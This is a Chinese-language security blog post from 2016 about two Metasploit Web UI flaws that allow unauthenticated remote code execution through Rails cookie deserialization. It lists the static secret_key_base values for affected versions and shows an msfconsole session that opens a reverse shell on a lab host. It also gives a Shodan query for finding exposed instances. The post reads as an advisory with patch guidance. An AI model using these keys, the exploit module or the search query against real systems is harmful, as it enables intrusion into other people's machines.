?

Sep 21 2016

Metasploit 反序列化漏洞,可遠程非授權執行代碼(含exp,9/21 06點更新)

首頁 » 漏洞收集 » Metasploit 反序列化漏洞,可遠程非授權執行代碼(含exp,9/21 06點更新)   

 

1.png

 

在本周Rapid7發布的4.12.0-2016091401補丁[0]描述中我們可以看到有2個漏洞結合這2個漏洞遠程攻擊者可以非認證的在metasploit產品上執行任意代碼,隨后有研究人員也放出了POC攻擊代碼[1]

PS:補丁、POC見文章最后參考文檔


漏洞1:Metasploit Web UI's config.action_dispatch.cookies_serializer 設置為 :hybrid


OVE ID: OVE-20160904-0001

私有披露日期: 2016-09-04

公開披露日期: 2016-09-19

廠商公告   : https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401

影響的版本 : Metasploit 4.12.0-2016061501 到 4.12.0-2016083001


Rails應用會接受一個標記的cookies來處理會話,在Rails 4.1的以前版本中,使用Marshal進行序列化,允許實例化任意對象的反序列化。Rails 4.1引入JSON cookie序列化機制,默認不允許任意對象實例化,這種配置要安全的多。Rails 4.1也引入了’hybrid' cookie序列化,這將允許反序列化JSON和Marshal序列化的cookies,當cookie序列化設置為Marshal或hybird時,遠程攻擊者如果知道cookie signing key的值,就能夠構造會話cookie,觸發Marshal反序列化,實現任意代碼執行。


Metasploit Community, Express 和 Pro 版本的 Web UI在 Metasploit 4.12.0-2016091401之前的config.action_dispatch.cookies_serializer 值設置為 :hybrid,直到Metasploit 4.12.0-2016091401,才將其值設置為:json,因此用戶需要更新到Metasploit 4.12.0-2016091401或更新版本才能有效防護此漏洞


參考:

[0] http://blog.bigbinary.com/2014/12/23/migrating-existing-session-cookies-while-upgrading-to-rails-4-1-and-above.html

[1] https://www.rapid7.com/db/modules/exploit/multi/http/rails_secret_deserialization



漏洞2:Metasploit Weekly Release Static secret_key_base pre-auth RCE


OVE ID: OVE-20160904-0002

私有披露日期: 2016-09-04

公開披露日期: 2016-09-19

廠商公告   :https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401

影響的版本 : Metasploit 4.12.0-2016061501 到 4.12.0-2016083001


Metasploit Community, Express 和 Pro版本,WEB UI的secret_key_base值是固定已知的, 而且Metasploit的config.action_dispatch.cookies_serializer的值默認又為:hybrid,這導致攻擊者可以遠程非認證的構造cookies,實現反序列化任意Marshall對象,以daemon用戶權限在裝有Metasploit的機器上執行任意命令。

已知的secret_key_base值如下:

4.12.0-2016061501,d25e9ad8c9a1558a6864bc38b1c79eafef479ccee5ad0b4b2ff6a917cd8db4c6b80d1bf1ea960f8ef922ddfebd4525fcff253a18dd78a18275311d45770e5c9103fc7b639ecbd13e9c2dbba3da5c20ef2b5cbea0308acfc29239a135724ddc902ccc6a378b696600a1661ed92666ead9cdbf1b684486f5c5e6b9b13226982dd7
4.12.0-2016062101,99988ff528cc0e9aa0cc52dc97fe1dd1fcbedb6df6ca71f6f5553994e6294d213fcf533a115da859ca16e9190c53ddd5962ddd171c2e31a168fb8a8f3ef000f1a64b59a4ea3c5ec9961a0db0945cae90a70fd64eb7fb500662fc9e7569c90b20998adeca450362e5ca80d0045b6ae1d54caf4b8e6d89cc4ebef3fd4928625bfc
4.12.0-2016072501,446db15aeb1b4394575e093e43fae0fc8c4e81d314696ac42599e53a70a5ebe9c234e6fa15540e1fc3ae4e99ad64531ab10c5a4deca10c20ba6ce2ae77f70e7975918fbaaea56ed701213341be929091a570404774fd65a0c68b2e63f456a0140ac919c6ec291a766058f063beeb50cedd666b178bce5a9b7e2f3984e37e8fde
4.12.0-2016081001,61c64764ca3e28772bddd3b4a666d5a5611a50ceb07e3bd5847926b0423987218cfc81468c84a7737c23c27562cb9bf40bc1519db110bf669987c7bb7fd4e1850f601c2bf170f4b75afabf86d40c428e4d103b2fe6952835521f40b23dbd9c3cac55b543aef2fb222441b3ae29c3abbd59433504198753df0e70dd3927f7105a
4.12.0-2016081201,23bbd1fdebdc5a27ed2cb2eea6779fdd6b7a1fa5373f5eeb27450765f22d3f744ad76bd7fbf59ed687a1aba481204045259b70b264f4731d124828779c99d47554c0133a537652eba268b231c900727b6602d8e5c6a73fe230a8e286e975f1765c574431171bc2af0c0890988cc11cb4e93d363c5edc15d5a15ec568168daf32
4.12.0-2016083001,18edd3c0c08da473b0c94f114de417b3cd41dace1dacd67616b864cbe60b6628e8a030e1981cef3eb4b57b0498ad6fb22c24369edc852c5335e27670220ea38f1eecf5c7bb3217472c8df3213bc314af30be33cd6f3944ba524c16cafb19489a95d969ada268df37761c0a2b68c0eeafb1355a58a9a6a89c9296bfd606a79615
unreleased build,b4bc1fa288894518088bf70c825e5ce6d5b16bbf20020018272383e09e5677757c6f1cc12eb39421eaf57f81822a434af10971b5762ae64cb1
 
 
 
 
 
 
 


攻擊Metasploit本身的模塊已經有安全研究人員開發出來了,路徑為
exploit/multi/http/rails_secret_deserialization
使用方法如下:
 
msf exploit(metasploit_static_secret_key_base) > info
       Name: Metasploit Web UI Static secret_key_base Value
     Module: exploit/multi/http/metasploit_static_secret_key_base
   Platform: Ruby Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-15
Provided by:
  Justin Steven
  joernchen of Phenoelit <[email protected]>
Available targets:
  Id  Name
  --  ----
  0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      3790             yes       The target port
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to the Metasploit Web UI
  VHOST                       no        HTTP server virtual host
Payload information:
Description:
  This module exploits the Web UI for Metasploit Community, Express
  and Pro where one of a certain set of Weekly Releases have been
  applied. These Weekly Releases introduced a static secret_key_base
  value. Knowledge of the static secret_key_base value allows for
  deserialization of a crafted Ruby Object, achieving code execution.
  This module is based on
  exploits/multi/http/rails_secret_deserialization
References:
  OVE (20160904-0002)
  https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401
msf exploit(metasploit_static_secret_key_base) > set RHOST 172.18.0.2
RHOST => 172.18.0.2
msf exploit(metasploit_static_secret_key_base) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(metasploit_static_secret_key_base) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(metasploit_static_secret_key_base) > set LPORT 4444
LPORT => 4444
msf exploit(metasploit_static_secret_key_base) > exploit
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Checking for cookie _ui_session
[*] Searching for proper SECRET
[*] Sending cookie _ui_session
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:47590) at 2016-09-19 19:26:30 +1000
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
exit
^C
Abort session 1? [y/N]  y
[*] 172.18.0.2 - Command shell session 1 closed.  Reason: User exit

 
 
 


		

Rapid7 在 etasploit 4.12.0-2016091401版本中修復了這個問題,將會檢測secret_key_base的值是否是默認值,如果是,將重新生成,因此用戶要盡快升級到Metasploit 4.12.0-2016091401或以上版本


參考:

[0] https://github.com/rapid7/metasploit-framework/pull/7304

[1] https://github.com/rapid7/metasploit-framework/pull/7341


更新:


通過shodan的

title:"metasploit is initializing"

關鍵字來尋找對互聯網開放的metasploit,(2016/9/21 9點更新)

 

 
2.png


正文部分到此結束

文章標簽: Metasploit漏洞

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «windows權限提升基礎知識 | 解密方程式組織的Unix后門NOPEN»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖